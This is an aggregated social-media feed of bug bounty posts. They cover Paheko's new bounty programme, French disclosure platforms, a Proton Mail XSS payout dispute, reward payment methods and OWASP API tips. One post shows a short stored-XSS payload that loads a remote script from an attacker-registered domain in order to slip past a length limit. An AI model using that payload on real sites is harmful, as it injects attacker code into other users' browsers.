Bug Bounty Hunters Community

paheko, French
@paheko@piaille.fr avatar

Nous ouvrons notre programme de bug bounty pour !

Cela veut dire que si vous cherchez et trouvez des failles de sécurité dans Paheko, on peut vous récompenser. Le montant de la récompense sera fait en fonction de la sévérité de la faille. On a débloqué 1000 € pour le moment, montant amené à évoluer en fonction des retours que nous recevrons.

Un audit de sécurité partiel aura aussi lieu dans les mois qui viennent.

Pour les détails sur le bug bounty, voir ici : https://fossil.kd2.org/paheko/doc/trunk/SECURITY.md

bohwaz, French
@bohwaz@mamot.fr avatar

Hello les gens et les , des gens qui ont déjà mis en place un programme de pour un projet open source ?

La plupart des sites de bug bounty semblent conçus pour les grosses boîtes.

cyber_learning, French
@cyber_learning@piaille.fr avatar

Avons nous, en France et en français, une plate-forme éthique de divulgation de faille cyber à but non lucratif ?
Type openbugbounty ?
Si oui, laquelle ?

Le boost corrige les failles xss

#cyber #bugbounty #informatique

cyber_learning,
@cyber_learning@piaille.fr avatar

@shalien 👍en effet, l'ansii propose le service. La cnil non (seulement des déclarations de perte/violation de données.)

Merci

shalien,
@shalien@projetretro.io avatar

@cyber_learning Désolé c'était de tête, j'aurais dû creuser

ChickenPwny,

=D it takes all the nuclei output makes it pretty now.

checkout my tool https://github.com/PolitoInc/EGOAlpha

@jerry behold the tool i made xD

jerry,

@ChickenPwny very nice!

rwxrwx,

@protonmail you paid $750 for a mail-based XSS? this is disappointing for a "service that respects privacy and puts people [...] first". https://www.sonarsource.com/blog/code-vulnerabilities-leak-emails-in-proton-mail/ #bugbounty #protonmail

protonmail,
@protonmail@mastodon.social avatar

@rwxrwx The issue was fixed in early July 2022. The non-web Proton Mail apps were never affected. At the time the issue was reported, we also conducted a thorough analysis of our available spam and virus filter logs and found no evidence of this attack in the wild except for the proof-of-concept reported to us. This is consistent with the attack's difficulty and the unlikely series of user actions required to make it work.

vito,

I had a field that allows html but the length is limited to 40 server side so I couldn't do much. So I registered the domain https://XXX.cc and could load a remote script from <script src=//https://xxx.cc></script> which fits in 30, and got it working nicely. #bugbounty

vito,

@CenturyAvocado wow 5 letters. I tried to find one but they all seem gone now :)

CenturyAvocado,
@CenturyAvocado@fosstodon.org avatar

@vito "0r.lc" and some other permutations appear to still be available ;)

lirantal,

ooh wow, imagemagick is the gift that keeps on giving RCE and command injection 🫣

check out this beauty of a poc

thijs,

So somebody has reported an issue through your responsible disclosure program.

If the report is eligible for a reward, what is the preferred way of transerring the money? Is that i.e. PayPal or a different platform?

ChickenPwny,

@kkarhan @thijs you can use almost any option really some people pay in econ, you can wire the money to your account, PayPal venmo

ChickenPwny,

@kkarhan @thijs typically we can trust companies with bank stuff. It's not like they could find you if they wanted if you commited crimes. It's also good for your branding as a hacker.

oggy, French
ChickenPwny,

#bugbounty leaderboard

sergeant,
@sergeant@qoto.org avatar

@ChickenPwny Gay Pride?

insiderphd,

If you've seen the updated OWASP API Top 10 you may be a bit confused by the "Authorisation" vulnerabilities - aren't they all just explaining the same thing? Here's a breakdown of the 4 access control issues you common see in APIs 👇👇
https://www.craft.me/s/CysIiph247P5AQ
#bugbountytips #BugBounty

_ut0p1c,

@insiderphd Thanks for sharing! Last time I checked, I think it was earlier this year, OWASP was last updated in 2021is this new info?

0x58,
sanjaymenon,
@sanjaymenon@mastodon.social avatar

Disposable-mailbox Docker

A self hosted yopmail like server running in a docker

https://github.com/Orange-Cyberdefense/disposable-mailbox-docker

#bugbounty #hacking #infosec #security

hdm,

@sanjaymenon got to love that commit message:

"removed stuff"

sanjaymenon,
@sanjaymenon@mastodon.social avatar

@hdm 😂

sanjaymenon,
@sanjaymenon@mastodon.social avatar
tdp_org,
@tdp_org@mastodon.social avatar

Someone just reported that a link from our Bug Bounty Hall of Fame page goes to an unregistered profile - i.e. link destination takeover.

Beautiful. Well played. The circle is complete.

  • All
  • Subscribed
  • Moderated
  • Favorites
  • BugBounty
  • ngwrru68w68
  • DreamBathrooms
  • thenastyranch
  • magazineikmin
  • InstantRegret
  • GTA5RPClips
  • Youngstown
  • everett
  • slotface
  • rosin
  • osvaldo12
  • mdbf
  • kavyap
  • cubers
  • megavids
  • modclub
  • normalnudes
  • tester
  • khanakhh
  • Durango
  • ethstaker
  • tacticalgear
  • Leos
  • provamag3
  • anitta
  • cisconetworking
  • JUstTest
  • lostlight
  • All magazines